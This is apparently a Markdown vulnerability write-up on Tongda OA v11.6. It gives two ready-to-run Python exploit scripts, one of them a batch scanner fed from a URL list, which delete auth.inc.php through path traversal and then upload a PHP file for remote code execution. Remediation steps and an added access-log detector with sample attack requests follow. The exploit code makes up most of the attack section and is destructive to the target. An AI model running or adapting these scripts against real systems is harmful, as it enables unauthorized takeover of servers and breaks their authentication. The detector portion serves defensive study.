017-通达OA v11.6 任意文件删除+文件上传.md (4.31 KB, 2021-07-17 00:01:26)

# Tongda OA v11.6 Arbitrary File Deletion + File Upload
    
    
Vulnerability name: Tongda OA (通达OA) arbitrary file deletion + file upload vulnerability
Affected versions: Tongda OA v11.6
Description:
Tongda OA (Office Anywhere, a networked intelligent office system) is a collaborative office automation system developed in-house by Beijing Tongda Xinke Technology Co., Ltd. (北京通达信科科技有限公司). It covers workflow approval, administrative office work, daily affairs, data statistics and analysis, instant messaging, mobile office and more.
An attacker can use the arbitrary file deletion vulnerability to delete auth.inc.php and then chain it with the file upload vulnerability, ultimately achieving remote code execution (RCE) and taking control of the server.
    
exp.py
    
    
```python
'''
Update:
Special notice:
This PoC is not harmless: it deletes a file on the target system, which stops the system from working normally.
Because the target system and network environment are not under your control, it is impossible to write an EXP for this vulnerability that is completely harmless under all conditions.
Use it with great care, and only after obtaining the other party's written authorization.
If you only want to check whether the vulnerability exists, write your own script that only checks whether /module/appbuilder/assets/print.php exists.
'''
import requests
target="http://127.0.0.1:8203/"
payload="<?php echo 123456 ?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to delete auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('hack.php', payload)}
requests.post(url=url,files=files)
url=target+"/_hack.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]File uploaded successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")
```
    
Tongda OA 0day vulnerability, batch RCE (for research and study only)
    
    
```python
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
# by Tommy, modified from the original author's version, 2020-8-19, Tongda OA 0day exploit
import sys
version = sys.version_info
if version < (3, 0):
    print('The current version is not supported, you need to use python3')
    sys.exit()

def exploit(target):
    try:
        payload='<?php echo md5("exp-test"); ?>'  # harmless check
        print(target,"[*]删除auth.inc.php...")

        url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"  # request that deletes auth.inc.php
        requests.get(url=url,verify=False,timeout=10)
        print(target,"[*]正在检查文件是否已删除...")
        url=target+"/inc/auth.inc.php"
        page=requests.get(url=url,verify=False,timeout=10).text
        #print(page)
        if 'No input file specified.' not in page:
            print(target,"[-]无法删除auth.inc.php文件")
            return 0
        print(target,"[+]删除auth.inc.php成功")
        print(target,"[*]开始上传payload...")
        url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
        files = {'FILE1': ('deconf.php', payload)}
        requests.post(url=url,files=files,verify=False,timeout=10)
        url=target+"/_deconf.php"
        page=requests.get(url=url,verify=False,timeout=10).text
        if 'No input file specified.' not in page:
            print("[+]************************文件已存在,上传成功************************")
            if '8a8127bc83b94ad01414a7a3ea4b8' in page:  # only confirm the vulnerability if md5() was actually executed, to reduce false positives
                print(target,"************************代码执行成功,存在漏洞************************")
                print(target,"[+]URL:",url)
        else:
            print(target,"[-]文件上传失败")
    except Exception as e:
        print(target,e)

urls='url.txt'
print("[*]警告:利用此漏洞,会删除auth.inc.php,这可能会损坏OA系统")
input("按Enter继续")
for line in open(urls,'r',encoding='utf-8'):
    fields=line.split()  # split() once; calling it again on the resulting list raises AttributeError
    if not fields:
        continue  # skip blank lines instead of failing on fields[0]
    exploit(fields[0])
```
    
Remediation
Delete /module/appbuilder/assets/print.php
Upgrade to the latest version
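For defenders, the following is an added example (not part of the original write-up and not Tongda's own code): a small Python access-log checker that flags requests to the two endpoints named above when the `guid` or `repkid` parameter carries a traversal sequence (`../` or `.<>.`), and raises a separate chain finding when a deletion attempt from one source IP is followed by a traversal upload from the same IP. It assumes an Apache/nginx combined log format; the log lines, IPs, timestamps and user agents are constructed samples, and the third line shows the `<>` characters percent-encoded as an HTTP client would send them.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format). IPs, timestamps and
# user agents are made up; the URL patterns are the ones from the write-up above.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jul/2021:10:00:01 +0800] "GET /module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1"
10.0.0.5 - - [17/Jul/2021:10:00:02 +0800] "GET /inc/auth.inc.php HTTP/1.1" 404 20 "-" "python-requests/2.25.1"
10.0.0.5 - - [17/Jul/2021:10:00:03 +0800] "POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./ HTTP/1.1" 200 15 "-" "python-requests/2.25.1"
10.0.0.7 - - [17/Jul/2021:10:05:00 +0800] "GET /general/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Jul/2021:10:06:00 +0800] "GET /module/appbuilder/assets/print.php?guid=report1 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# "../" and the ".<>." sequence used against upload.php (matched after percent-decoding)
TRAVERSAL_RE = re.compile(r'\.\./|\.<>\.')

PRINT_PHP = "/module/appbuilder/assets/print.php"
UPLOAD_PHP = "/general/data_center/utils/upload.php"


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes values, so %3C%3E becomes <> before the regex runs
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return a finding type for one parsed request, or None if nothing is suspicious."""
    path = rec["path"].lower()
    if path.endswith(PRINT_PHP):
        guid = "".join(rec["query"].get("guid", []))
        if TRAVERSAL_RE.search(guid):
            return "file-delete-traversal"
        # informational: after the fix above this endpoint should no longer exist at all
        return "print-php-access"
    if path.endswith(UPLOAD_PHP):
        repkid = "".join(rec["query"].get("repkid", []))
        if TRAVERSAL_RE.search(repkid):
            return "upload-traversal"
    return None


def analyze(log_text):
    """Scan log text and return (ip, finding) tuples in log order. A deletion attempt
    from an IP that is later followed by a traversal upload from the same IP yields an
    extra "delete-then-upload-chain" finding."""
    findings = []
    delete_seen = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind is None:
            continue
        findings.append((rec["ip"], kind))
        if kind == "file-delete-traversal":
            delete_seen.add(rec["ip"])
        elif kind == "upload-traversal" and rec["ip"] in delete_seen:
            findings.append((rec["ip"], "delete-then-upload-chain"))
    return findings


if __name__ == "__main__":
    for ip, kind in analyze(SAMPLE_LOG):
        print(f"{ip}\t{kind}")
```

Run it against real logs by passing the file contents to `analyze()`. The chain finding is the one worth paging on: a single hit on print.php with a traversal `guid` is a deletion attempt, but a later upload with a traversal `repkid` from the same source means auth.inc.php may already be gone and a webshell may be in place, so the host should be treated as compromised until the webroot has been checked for unexpected `_*.php` files and auth.inc.php restored.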
    